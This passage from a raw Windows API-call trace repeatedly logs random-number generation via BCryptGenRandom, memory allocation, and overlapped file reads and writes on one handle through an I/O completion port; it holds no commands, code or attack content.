cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0202.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.396] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0202.396] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.396] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.396] free (_Block=0x3e305b8) [0202.397] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.397] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.397] free (_Block=0x1fa91d0) [0202.397] free (_Block=0x1fa2ed8) [0202.397] free (_Block=0x1fa90b8) [0202.397] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.397] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.398] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.423] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8a4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.423] CloseHandle (hObject=0x2a8) returned 1 [0202.423] free (_Block=0x3df0008) [0202.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0202.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0202.434] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.434] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.434] free (_Block=0x3e305b8) [0202.434] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.434] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.435] free (_Block=0x1fa91d0) [0202.435] free (_Block=0x1fa2ed8) [0202.435] free (_Block=0x1fa90b8) [0202.435] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.435] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.438] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.439] CloseHandle (hObject=0x2a8) returned 1 [0202.439] free (_Block=0x3df0008) [0202.439] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0202.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0202.449] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.449] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.449] free (_Block=0x3e305b8) [0202.449] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.449] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.450] free (_Block=0x1fa91d0) [0202.450] free (_Block=0x1fa2ed8) [0202.450] free (_Block=0x1fa90b8) [0202.450] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.450] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x910, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.465] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x756, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.466] CloseHandle (hObject=0x2a8) returned 1 [0202.466] free (_Block=0x3df0008) [0202.466] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0202.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.487] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0202.487] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.487] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.487] free (_Block=0x3e305b8) [0202.487] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.487] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.488] free (_Block=0x1fa91d0) [0202.488] free (_Block=0x1fa2ed8) [0202.488] free (_Block=0x1fa90b8) [0202.488] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.488] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.501] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x796, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.501] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.502] CloseHandle (hObject=0x2a8) returned 1 [0202.502] free (_Block=0x3df0008) [0202.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0202.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0202.512] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.512] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.512] free (_Block=0x3e305b8) [0202.512] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.512] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.512] free (_Block=0x1fa91d0) [0202.512] free (_Block=0x1fa2ed8) [0202.512] free (_Block=0x1fa90b8) [0202.512] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.512] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.513] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.513] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.524] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.524] CloseHandle (hObject=0x2a8) returned 1 [0202.524] free (_Block=0x3df0008) [0202.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.540] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.541] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0202.541] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.541] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0202.542] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.542] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.542] free (_Block=0x3e305b8) [0202.542] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.542] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.542] free (_Block=0x1fa91d0) [0202.542] free (_Block=0x1fa2ed8) [0202.542] free (_Block=0x1fa90b8) [0202.542] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.543] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.710] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x12f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.711] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.718] CloseHandle (hObject=0x2a8) returned 1 [0202.718] free (_Block=0x3df0008) [0202.718] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0202.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0202.904] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.904] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.905] free (_Block=0x3e305b8) [0202.905] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.905] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.905] free (_Block=0x1fa91d0) [0202.905] free (_Block=0x1fa2ed8) [0202.905] free (_Block=0x1fa90b8) [0202.905] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.905] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.905] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.921] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.921] CloseHandle (hObject=0x2a8) returned 1 [0202.921] free (_Block=0x3df0008) [0202.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.928] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0202.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0202.929] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.929] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.929] free (_Block=0x3e305b8) [0202.929] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.929] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.930] free (_Block=0x1fa91d0) [0202.930] free (_Block=0x1fa2ed8) [0202.930] free (_Block=0x1fa90b8) [0202.930] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.930] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.931] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.942] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x297, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.942] CloseHandle (hObject=0x2a8) returned 1 [0202.942] free (_Block=0x3df0008) [0202.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.949] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0202.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0202.950] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0202.950] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0202.950] free (_Block=0x3e305b8) [0202.950] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0202.950] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0202.951] free (_Block=0x1fa91d0) [0202.951] free (_Block=0x1fa2ed8) [0202.951] free (_Block=0x1fa90b8) [0202.951] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.951] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.952] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0202.952] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.961] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x134, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0202.962] CloseHandle (hObject=0x2a8) returned 1 [0202.962] free (_Block=0x3df0008) [0202.962] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, 